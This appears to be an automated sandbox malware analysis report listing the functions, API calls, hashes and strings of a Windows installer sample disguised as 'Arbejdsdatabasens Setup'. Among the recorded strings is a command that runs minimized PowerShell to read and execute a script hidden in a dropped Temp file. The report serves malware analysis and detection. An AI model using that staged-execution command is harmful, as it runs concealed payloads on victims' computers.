Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34

Uniqueness

Uniqueness Score: -1.00%

Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F7D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040600B,?,?,?,?,00000002,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam), ref: 00405FA1

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63aedcba74a49b4562ab558a9ce8badd8918627b7cb687f07547bd3961086ea3
Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
Opcode Fuzzy Hash: 63aedcba74a49b4562ab558a9ce8badd8918627b7cb687f07547bd3961086ea3
Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004041C7 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(0001042C,00000000,00000000,00000000), ref: 004041D9

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
Instruction ID: 4f5bfb943ccb7372f266285400f959559a3f08b639bcfa815988f1d16fb7a589
Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
Instruction Fuzzy Hash: A5C09BB17447017FEE20CB659D49F0777586750700F2544397755F60D4C674E461D61C

Uniqueness

Uniqueness Score: -1.00%

Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 004057D9 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,004045C2,?), ref: 004057E8

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004041B0 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040419D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F79), ref: 004041A7

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040521E: lstrlenA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00403233,00403233,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",00000000,00421715,745CEA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder",Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0

Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
Part of subcall function 00406575: GetExitCodeProcess.KERNEL32 ref: 004065A8

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: d57e87b463026526ce0d5e3073c1ccffb33a085325ecdf2eb373ef331298422e
Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
Opcode Fuzzy Hash: d57e87b463026526ce0d5e3073c1ccffb33a085325ecdf2eb373ef331298422e
Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403830 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6c9904e2e4a193b859733c01724cd2b556f8ea12817e0b27c9dfd70138bd88d1
Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
Opcode Fuzzy Hash: 6c9904e2e4a193b859733c01724cd2b556f8ea12817e0b27c9dfd70138bd88d1
Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040460D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0040465C
SetWindowTextA.USER32(00000000,?), ref: 00404686
SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
CoTaskMemFree.OLE32(00000000), ref: 00404742
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,Arbejdsdatabasens Setup: Installing,00000000,?,?), ref: 00404774
lstrcatA.KERNEL32(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam), ref: 00404780
SetDlgItemTextA.USER32 ref: 00404792

Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A

Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\demand_rpkb_060923.exe",745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\demand_rpkb_060923.exe",745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
Part of subcall function 004063D2: CharPrevA.USER32(?,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B

Part of subcall function 004049C4: lstrlenA.KERNEL32(Arbejdsdatabasens Setup: Installing,Arbejdsdatabasens Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam, xrefs: 0040476E, 00404773, 0040477E
A, xrefs: 00404730
C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6, xrefs: 0040475D
Arbejdsdatabasens Setup: Installing, xrefs: 0040470A, 0040476D

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Arbejdsdatabasens Setup: Installing$C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam
API String ID: 2624150263-3453627677
Opcode ID: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
Opcode Fuzzy Hash: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058E8
lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405930
lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405951
lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405957
FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405968
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
FindClose.KERNEL32(00000000), ref: 00405A26

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058CC
\*.*, xrefs: 0040592A
"C:\Users\user\Desktop\demand_rpkb_060923.exe", xrefs: 004058BF

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
